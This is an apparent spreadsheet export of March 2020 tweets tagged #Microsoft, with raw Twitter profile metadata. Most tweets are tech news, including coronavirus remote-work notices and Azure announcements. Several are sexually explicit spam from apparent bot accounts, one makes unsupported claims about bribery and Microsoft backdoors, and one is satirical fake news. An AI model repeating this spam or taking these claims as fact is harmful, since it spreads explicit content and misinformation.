'profile_image_url': 'http://pbs.twimg.com/profile_images/997348209830907904/DwzC1s9i_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/997348209830907904/DwzC1s9i_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/59501781/1565412108', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'D4B48D', 'profile_sidebar_fill_color': '95464C', 'profile_text_color': 'DE304B', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 05:35:05 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #OneNote Used To Sidestep #Phishing Detection
#CyberSecurity  https://t.co/SCGKiH8Ern</t>
  </si>
  <si>
    <t>{'id': 2932232055, 'id_str': '2932232055', 'name': 'BitByte ðŸ’', 'screen_name': 'ByteChomper', 'location': 'Peoples Republic of Madison', 'description': '#USArmy #Veteran #COV, #CyberSecurity, #Christian Cons-Ind #POTUS / #2A #1A #Veterans #BackBlue #Israel #OANN #KAG2020 #MAGAVeteran #NHL #VR', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 13003, 'friends_count': 14133, 'listed_count': 141, 'created_at': 'Fri Dec 19 16:48:09 +0000 2014', 'favourites_count': 52294, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 51059,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'http://pbs.twimg.com/profile_images/1210335205195755520/VB2Mwhpy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210335205195755520/VB2Mwhpy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2932232055/1577401053', 'profile_link_color': '1B95E0',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</si>
  <si>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Thu Mar 05 05:34:11 +0000 2020</t>
  </si>
  <si>
    <t>I move my ass on the dick really fast #Montana   #microsoft #clip https://t.co/NKmojZmZkk</t>
  </si>
  <si>
    <t>{'id': 1235116530146447360, 'id_str': '1235116530146447360', 'name': 'Allison Miller', 'screen_name': 'turnlecningcas', 'location': 'Cincinnati, USA', 'description': 'Without his love I can do nothing, with his love, there is nothing I cannot do.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 19, 'listed_count': 0, 'created_at': 'Wed Mar 04 08:15:13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'http://pbs.twimg.com/profile_images/1235137914553716737/OjPu34VC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235137914553716737/OjPu34VC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235116530146447360/1583314840',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</si>
  <si>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05:31:37 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft and #Lenovo have teamed up to validate the #Lenovo #ThinkSystem SE350 for Microsoft's Azure Stack HCI program. #LenovoDataCenter #WeAreLenovo https://t.co/hNCxVTbyx0</t>
  </si>
  <si>
    <t>{'id': 873837745122287616, 'id_str': '873837745122287616', 'name': 'Marian Korienek', 'screen_name': 'MarianKorienek', 'location': 'Slovak Republic', 'description': 'General Manager, Data Center Group, PL, CZ&amp;SK at Lenovo Global Technology', 'url': 'https://t.co/bNnudU2GLH', 'entities': {'url': {'urls': [{'url': 'https://t.co/bNnudU2GLH', 'expanded_url': 'http://www.lenovo.com', 'display_url': 'lenovo.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 97, 'friends_count': 234, 'listed_count': 3, 'created_at': 'Sun Jun 11 09:42:08 +0000 2017', 'favourites_count': 65, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2376,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'http://pbs.twimg.com/profile_images/876374176814288896/iAP7Xu4E_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/876374176814288896/iAP7Xu4E_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/873837745122287616/1566820966',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</si>
  <si>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05:30:25 +0000 2020</t>
  </si>
  <si>
    <t>Do not be afraid of your desires! Fear mine! #Mesa   #microsoft #bwc https://t.co/8iu0GssVQq</t>
  </si>
  <si>
    <t>{'id': 1235302047647502338, 'id_str': '1235302047647502338', 'name': 'Erica Robinson', 'screen_name': 'biczahunlia', 'location': 'Boston, USA', 'description': 'The greatest healing therapy is friendship and love', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 19, 'listed_count': 0, 'created_at': 'Wed Mar 04 20:32:19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'http://pbs.twimg.com/profile_images/1235307502318899200/Ly-bfy1y_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235307502318899200/Ly-bfy1y_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235302047647502338/1583355263',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</si>
  <si>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05:29:33 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> NEWS  #bbc does not mention #microsoft #windows (it's bribed by #billgates and manned by Microsoft execs)  #CathayPacific fined 500,000 over customer data protection failure https://t.co/BMj0dtjNMW</t>
  </si>
  <si>
    <t>Thu Mar 05 05:28:41 +0000 2020</t>
  </si>
  <si>
    <t>#CathayPacific another example of #Windows TCO
They pay the huge price of getting their software from criminals at #microsoft who put back doors in everything</t>
  </si>
  <si>
    <t>Thu Mar 05 05:27:39 +0000 2020</t>
  </si>
  <si>
    <t>Thank you to the @Microsoft SLT for protecting not only their employees but the community in regards to #CoronaVirus with the decision to allow all those who can work remotely to do so for at least the next 3 weeks. True leadership at the finest.  #Microsoft #MicrosoftSLT</t>
  </si>
  <si>
    <t>{'id': 40242586, 'id_str': '40242586', 'name': 'â­ï¸â­ï¸ Frank Novak', 'screen_name': 'frankjnovak', 'location': 'Redmond, WA', 'description': 'From Danbury, CT currently residing in the Seattle area. Proud father of 6. Red Sox, Seahawks, and Seattle Sounders FC Supporter. Tweets/Opinions are my own.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 124, 'friends_count': 301, 'listed_count': 5, 'created_at': 'Fri May 15 13:47:41 +0000 2009', 'favourites_count': 1027, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2836,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'http://pbs.twimg.com/profile_images/1150245567823376384/zkzOOySL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1150245567823376384/zkzOOySL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/40242586/1553651779', 'profile_link_color': 'B9F070',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</si>
  <si>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Thu Mar 05 05:26:08 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft offers 6 month Office 365 E1 Trial enabling users to work remotely in preparation for increased #Covid_19 impact. Microsoft Teams | Microsoft Docs https://t.co/aOcbN3sRvu</t>
  </si>
  <si>
    <t>{'id': 77195040, 'id_str': '77195040', 'name': 'Alex Mcloughlin', 'screen_name': 'UnionCloudAlex', 'location': 'Alella, Barcelona', 'description': 'Tech Entrepreneur with two exits. Currently @Claranet . Live in ðŸ‡ªðŸ‡¸ , work in ðŸ‡¬ðŸ‡§. Angel/seed investor. Board member @designvoiceai . Family, ðŸŒï¸\u200dâ™€ï¸, â›· and ðŸ·', 'url': 'https://t.co/XK7yIn3pc2', 'entities': {'url': {'urls': [{'url': 'https://t.co/XK7yIn3pc2', 'expanded_url': 'http://www.claranet.co.uk', 'display_url': 'claranet.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1012, 'friends_count': 2469, 'listed_count': 58, 'created_at': 'Fri Sep 25 11:49:10 +0000 2009', 'favourites_count': 2507, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5121,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'http://pbs.twimg.com/profile_images/1110598524738170880/2mKjeoTo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1110598524738170880/2mKjeoTo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/77195040/1553622298',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</si>
  <si>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05:24:24 +0000 2020</t>
  </si>
  <si>
    <t>Retweet if you want my perfect fat ass sat on my face #Iowa   #microsoft #snapchat https://t.co/Wou67T0Evh</t>
  </si>
  <si>
    <t>{'id': 1235348767508963336, 'id_str': '1235348767508963336', 'name': 'Kim March', 'screen_name': 'quiprisdeigil', 'location': 'Des Moines, USA', 'description': 'Iâ€™m much more me when Iâ€™m with you.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 7, 'listed_count': 0, 'created_at': 'Wed Mar 04 23:37:58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'http://pbs.twimg.com/profile_images/1235354083269242882/T78gTADN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235354083269242882/T78gTADN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235348767508963336/1583366571',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</si>
  <si>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05:23:16 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft has asked all Seattle and Bay Area employees to work from home until March 25 due to #coronavirus fears
via @businessinsider cc  @JimHarris @jblefevre60 @_atanas_ @IrmaRaste @Fabriziobustama  https://t.co/RZf5sYu26n</t>
  </si>
  <si>
    <t>{'id': 202590356, 'id_str': '202590356', 'name': 'Harold Sinnott ðŸ“²', 'screen_name': 'HaroldSinnott', 'location': 'Miami, FL', 'description': 'Passionate about #EmergingTech #FutureOfWork #Automation #AI #RPA #Megatrends #Influencer #5G #BusinessIntelligence #B2B', 'url': 'https://t.co/y07ZXRNwLV', 'entities': {'url': {'urls': [{'url': 'https://t.co/y07ZXRNwLV', 'expanded_url': 'http://www.linkedin.com/in/haroldsinnott/', 'display_url': 'linkedin.com/in/haroldsinnoâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 64469, 'friends_count': 40754, 'listed_count': 2435, 'created_at': 'Thu Oct 14 11:38:43 +0000 2010', 'favourites_count': 183596, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 75921,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'http://pbs.twimg.com/profile_images/1214348334841901056/QSdqkzO-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214348334841901056/QSdqkzO-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/202590356/1583401152',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</si>
  <si>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Mar 05 05:20:36 +0000 2020</t>
  </si>
  <si>
    <t>Take off your clothes and get on all fours. Alive! #Fort Worth   #water #microsoft https://t.co/BoXA3eidIe</t>
  </si>
  <si>
    <t>{'id': 1235195610430681088, 'id_str': '1235195610430681088', 'name': 'Mandy Little', 'screen_name': 'asquinontie', 'location': 'Virginia Beach, USA', 'description': 'When I saw you I fell in love, and you smiled because you knew.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 9, 'listed_count': 0, 'created_at': 'Wed Mar 04 13:29:25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'http://pbs.twimg.com/profile_images/1235232719472381952/AQcaZR6G_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235232719472381952/AQcaZR6G_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235195610430681088/1583337438',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</si>
  <si>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05:12:51 +0000 2020</t>
  </si>
  <si>
    <t>I love when they fuck me for a long time, all night #Vista   #microsoft #pokemon https://t.co/AeiWUAMR7f</t>
  </si>
  <si>
    <t>{'id': 1235273211908063232, 'id_str': '1235273211908063232', 'name': 'Noell Daisy', 'screen_name': 'disatemic', 'location': 'Phoenix, USA', 'description': 'The course of true love never did run smooth', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 11, 'listed_count': 0, 'created_at': 'Wed Mar 04 18:37:44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'http://pbs.twimg.com/profile_images/1235277648315789314/e-TOiBmy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235277648315789314/e-TOiBmy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235273211908063232/1583348158',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</si>
  <si>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05:11:58 +0000 2020</t>
  </si>
  <si>
    <t>Seems like @instagram has a problem with people promoting entrepreneurship and black owned businesses.They let us degrade our women but stop us when we uplift them  #BlackExcellence #BlackTwitter #BlackGirlMagic #Nintendo #Microsoft #Xbox #E3 #ComicCon #Playstation https://t.co/Nh8PZSP4iE</t>
  </si>
  <si>
    <t>{'id': 233808972, 'id_str': '233808972', 'name': 'Destined 4 Greatness', 'screen_name': '2KritiKal', 'location': 'Dallas, TX', 'description': 'PR Marketing Branding ...Always be prepared MIND BODY and SOUL #ArtOfWar Follow me on instagram @2KritiKal &amp; SnapChat @Mr.KritiK', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 844, 'friends_count': 2388, 'listed_count': 22, 'created_at': 'Tue Jan 04 04:37:07 +0000 2011', 'favourites_count': 2767, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11878,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'http://pbs.twimg.com/profile_images/1083780885965611009/wIRDTNDJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1083780885965611009/wIRDTNDJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/233808972/1547228593',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</si>
  <si>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05:07:58 +0000 2020</t>
  </si>
  <si>
    <t>Anyone have experience with Microsoft Word for Android?
Or another word processor for Android?
#WritingCommunity #amwriting #writers #authors #android #Microsoft #writerslife</t>
  </si>
  <si>
    <t>{'id': 1155246473031966725, 'id_str': '1155246473031966725', 'name': 'Kelli Rajala - Author', 'screen_name': 'KelliAuthor', 'location': '', 'description': 'Writer, Artist, Musician, Baker, Avid Reader, Cat Enthusiast, Hufflepuff. #writingcommunity \n\nDystopian, Paranormal, Fantasy, Magical Realism, LGBT+', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1455, 'friends_count': 1402, 'listed_count': 15, 'created_at': 'Sat Jul 27 22:39:57 +0000 2019', 'favourites_count': 4629, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 477, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1155246732302802947/VIQCWbc__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1155246732302802947/VIQCWbc__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1155246473031966725/1565448621',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</si>
  <si>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05:07:38 +0000 2020</t>
  </si>
  <si>
    <t>Red Ring Of Death (RROD) Returns For Series X 
Microsoft continues to push on the front foot against Sony, revealing the bold return of an infamous feature that is sure to win back next-gen market share.
#SeriesX #XboxSeriesX #Xbox #Xboxone #Microsoft  
https://t.co/cCVeM9PKwh https://t.co/G1l1jIpVHI</t>
  </si>
  <si>
    <t>{'id': 902690511139479552, 'id_str': '902690511139479552', 'name': 'Era Error', 'screen_name': 'EraErr0r', 'location': '', 'description': "The Video Game Industry's prime source for blatantly incorrect information.", 'url': 'https://t.co/b8XWhWPzQt', 'entities': {'url': {'urls': [{'url': 'https://t.co/b8XWhWPzQt', 'expanded_url': 'http://www.EraError.com', 'display_url': 'EraError.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 32, 'friends_count': 238, 'listed_count': 0, 'created_at': 'Wed Aug 30 00:32:44 +0000 2017', 'favourites_count': 440, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 213,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'http://pbs.twimg.com/profile_images/1211471115878428672/liVQkFTz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1211471115878428672/liVQkFTz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/902690511139479552/1581384690',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</si>
  <si>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05:06:33 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft tells #USemployees to work from home amid #coronavirus fear
@MicrosoftIndia
 https://t.co/vgjvN6D2FA</t>
  </si>
  <si>
    <t>{'id': 106039951, 'id_str': '106039951', 'name': 'My Mobile', 'screen_name': 'MyMobileMag', 'location': 'New Delhi', 'description': "My Mobile is India's first and most reputed monthly magazine dedicated to mobile ecosystem.\n#MyMobile", 'url': 'http://t.co/x1UwxwBzd6', 'entities': {'url': {'urls': [{'url': 'http://t.co/x1UwxwBzd6', 'expanded_url': 'http://mymobileindia.com', 'display_url': 'mymobileindia.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1658, 'friends_count': 211, 'listed_count': 107, 'created_at': 'Mon Jan 18 09:02:36 +0000 2010', 'favourites_count': 284, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 16662, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EBEBEB', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme19/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme19/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/941620028851437568/opHOYjJn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/941620028851437568/opHOYjJn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/106039951/1559650430', 'profile_link_color': 'DB1B1B', 'profile_sidebar_border_color': 'FFF8AD', 'profile_sidebar_fill_color': 'F6FFD1', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 05:06:23 +0000 2020</t>
  </si>
  <si>
    <t>#Free #PowerBIWebinar #Live register at https://t.co/8ukKxnFDP7
Expand your knowledge and skills by joining our free Power BI #webinar featuring a variety of topics to jumpstart your Power BI #career career. 
#Microsoft #PowerBI #ThursdayThoughts https://t.co/FxWzu33E7E</t>
  </si>
  <si>
    <t>{'id': 2649722198, 'id_str': '2649722198', 'name': 'Anji Nani', 'screen_name': 'AnjiNaini', 'location': 'Sircilla, India', 'description': 'whatever you will do in the dark ,,that will keeps you in the dazzle', 'url': 'https://t.co/67QujbgBHU', 'entities': {'url': {'urls': [{'url': 'https://t.co/67QujbgBHU', 'expanded_url': 'http://www.istudynew.com', 'display_url': 'istudynew.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 30, 'friends_count': 216, 'listed_count': 0, 'created_at': 'Wed Jul 16 02:05:32 +0000 2014', 'favourites_count': 267, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 152,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'http://pbs.twimg.com/profile_images/1198984271987269632/6Pc26zGr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1198984271987269632/6Pc26zGr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2649722198/1518515864',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</si>
  <si>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05:05:07 +0000 2020</t>
  </si>
  <si>
    <t>#Azure IoT Introduces seamless integration with Cisco IoT https://t.co/IYYkTUbVcl #cloud #microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 05:04:01 +0000 2020</t>
  </si>
  <si>
    <t>DON'T MISS the #Dubai stop of the HPE &amp;amp; #Microsoft #HybridCloud Roadshow on 11th March. More info here: https://t.co/z80k13wobk
#HPEalliances #UAE #DubaiDigital #UAEtech #HybridIT https://t.co/Clfjhvl7qG</t>
  </si>
  <si>
    <t>Thu Mar 05 05:03:55 +0000 2020</t>
  </si>
  <si>
    <t>Wow I put lot of sexvideos on my website ! #Cleveland   #photography #microsoft https://t.co/Q3nvLi3kek</t>
  </si>
  <si>
    <t>{'id': 1235256517055729667, 'id_str': '1235256517055729667', 'name': 'Rachel Smith', 'screen_name': 'lodtersnachanch', 'location': 'Baltimore, USA', 'description': 'Where there is love there is life', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 18, 'listed_count': 0, 'created_at': 'Wed Mar 04 17:31:24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'http://pbs.twimg.com/profile_images/1235265285374038016/Hnyt0mRO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235265285374038016/Hnyt0mRO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235256517055729667/1583345198',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</si>
  <si>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05:02:37 +0000 2020</t>
  </si>
  <si>
    <t>@merrie_mcgaw @NerdPyle I'm sure @satyanadella will make sure that in a situation like this #Corona virus #Microsoft as a responsible company would take care of all of their employees including their #vendors.</t>
  </si>
  <si>
    <t>{'id': 8986012, 'id_str': '8986012', 'name': 'Jukka Wallasvaara', 'screen_name': 'jukkaw', 'location': 'Redmond, WA', 'description': 'CTO and CISO\nEnthusiastic about security and to work with and for innovative App developers, CxOs, small businesses and enterprises around the world.', 'url': 'https://t.co/Lyc6rFkMxV', 'entities': {'url': {'urls': [{'url': 'https://t.co/Lyc6rFkMxV', 'expanded_url': 'https://www.linkedin.com/in/jukkawallasvaara/', 'display_url': 'linkedin.com/in/jukkawallasâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 478, 'friends_count': 226, 'listed_count': 11, 'created_at': 'Thu Sep 20 01:13:17 +0000 2007', 'favourites_count': 158, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 784,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'http://pbs.twimg.com/profile_images/687755145610964992/MAIbnscV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/687755145610964992/MAIbnscV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/8986012/1507385800',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</si>
  <si>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05:00:26 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Excel for #iPad #Tutorial and Feature overview. https://t.co/0l1THsgfbW #office365</t>
  </si>
  <si>
    <t>{'id': 2230546274, 'id_str': '2230546274', 'name': 'TechTechTV', 'screen_name': 'TechTechTV', 'location': 'London, UK', 'description': 'Technology Reviews, Unboxings and Tutorials. Lightning fast, without the waffle.', 'url': 'https://t.co/HkRB67dInI', 'entities': {'url': {'urls': [{'url': 'https://t.co/HkRB67dInI', 'expanded_url': 'http://www.techtech.tv', 'display_url': 'techtech.tv', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 588, 'friends_count': 745, 'listed_count': 13, 'created_at': 'Wed Dec 04 22:04:51 +0000 2013', 'favourites_count': 25, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 985,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'http://pbs.twimg.com/profile_images/1082017443327938560/WNlpaW5i_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1082017443327938560/WNlpaW5i_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2230546274/1501616912', 'profile_link_color': 'FAB81E',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</si>
  <si>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05:00:16 +0000 2020</t>
  </si>
  <si>
    <t>Be my blanket today - cover me body, but do not forget to do one thing #Denton   #microsoft #blackfriday https://t.co/ylUzpWnckp</t>
  </si>
  <si>
    <t>{'id': 1235262748310765569, 'id_str': '1235262748310765569', 'name': 'Ann Anderson', 'screen_name': 'gettisina', 'location': 'New Orleans, USA', 'description': 'It is not a lack of love, but a lack of friendship that makes unhappy marriages', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 8, 'friends_count': 29, 'listed_count': 0, 'created_at': 'Wed Mar 04 17:56:09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'http://pbs.twimg.com/profile_images/1235269614612996098/iq8KVUcw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235269614612996098/iq8KVUcw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235262748310765569/1583346240',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</si>
  <si>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05:00:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft and the #NFL are expanding their alliance to bring more technology to one of the worlds most popular professional sports leagues. https://t.co/yc2NBLLUEi</t>
  </si>
  <si>
    <t>{'id': 15861420, 'id_str': '15861420', 'name': 'Andre Essing', 'screen_name': 'aessing', 'location': 'Munich, Bavaria', 'description': '#Data, #Cloud &amp; #Azure #CosmosDB Enthusiast, #Community Addict and Cloud Solution Architect @Microsoft_DE | Tweets are my own', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 717, 'friends_count': 439, 'listed_count': 77, 'created_at': 'Fri Aug 15 09:02:32 +0000 2008', 'favourites_count': 1509, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5577,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'http://pbs.twimg.com/profile_images/1176599084179873794/_bejkn_b_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1176599084179873794/_bejkn_b_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15861420/1462312015', 'profile_link_color': '7EB2E2',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</si>
  <si>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05:00:02 +0000 2020</t>
  </si>
  <si>
    <t>#AkzoNobel Improving factory performance with Industrial Internet of Things  technology - #Microsoft #Azure #IIoT #Netherlands Philippe Huberts https://t.co/th4oGePVSC #MSFTAdvocate</t>
  </si>
  <si>
    <t>Thu Mar 05 04:58:15 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is recommending that all employees in the Seattle area work from home until 3/25.
Meetings in pajamas might become the new normal for me #coronavirus</t>
  </si>
  <si>
    <t>Thu Mar 05 04:56:58 +0000 2020</t>
  </si>
  <si>
    <t>Version 3.0 of #commanddotnet is released with lots of new features
 https://t.co/K1sdDUvBLP
#dotnet #microsoft #opensource</t>
  </si>
  <si>
    <t>{'id': 93014104, 'id_str': '93014104', 'name': 'Bilal Fazlani', 'screen_name': 'bilal_fazlani', 'location': 'Pune, India', 'description': 'father, software artisan, love #scala', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 55, 'friends_count': 269, 'listed_count': 0, 'created_at': 'Fri Nov 27 17:48:22 +0000 2009', 'favourites_count': 1527, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 645,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'http://pbs.twimg.com/profile_images/1083100742033068044/1ze8fCR6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1083100742033068044/1ze8fCR6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/93014104/1547066380',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</si>
  <si>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04:53:44 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #OneNote Used To Sidestep #Phishing Detection
https://t.co/Fxr5aDs2vu</t>
  </si>
  <si>
    <t>{'id': 797389786252079104, 'id_str': '797389786252079104', 'name': 'omvapt', 'screen_name': 'omvapt', 'location': 'Bengaluru South, India', 'description': 'Purple Hat Penetration Testers', 'url': 'https://t.co/jmuvpnxaw9', 'entities': {'url': {'urls': [{'url': 'https://t.co/jmuvpnxaw9', 'expanded_url': 'https://omvapt.com', 'display_url': 'omvapt.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 85, 'friends_count': 23, 'listed_count': 4, 'created_at': 'Sat Nov 12 10:45:14 +0000 2016', 'favourites_count': 33, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12324, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1120499152700551168/IsIMU1dj_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1120499152700551168/IsIMU1dj_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/797389786252079104/1559525379',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</si>
  <si>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04:47:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #OneNote Used To Sidestep #Phishing #Detection: https://t.co/mvUSXxo7qL via @threatpost</t>
  </si>
  <si>
    <t>{'id': 1207888909981454337, 'id_str': '1207888909981454337', 'name': 'Cyber Research &amp; Innovation Society', 'screen_name': 'CyberLegalIndia', 'location': 'New Delhi, India', 'description': '#Legaltech #Innovation #AI #Blockchain #IOT #5G #Robotics #drones #cyberlaw #cyberwar #techtrend #bigdata #techlegal #legaltech @swisscognitive @neerajaarora', 'url': 'https://t.co/750xZc6t6l', 'entities': {'url': {'urls': [{'url': 'https://t.co/750xZc6t6l', 'expanded_url': 'http://www.cyberpandit.org', 'display_url': 'cyberpandit.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 108, 'friends_count': 399, 'listed_count': 0, 'created_at': 'Fri Dec 20 05:02:20 +0000 2019', 'favourites_count': 208, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 441, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1208266174162587648/bPLbLYS6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1208266174162587648/bPLbLYS6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1207888909981454337/1576908080',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</si>
  <si>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04:45:27 +0000 2020</t>
  </si>
  <si>
    <t>Retweet if you want me to suck deeply, to the very balls #Hartford   #microsoft #grateful https://t.co/ooG1FXTeK2</t>
  </si>
  <si>
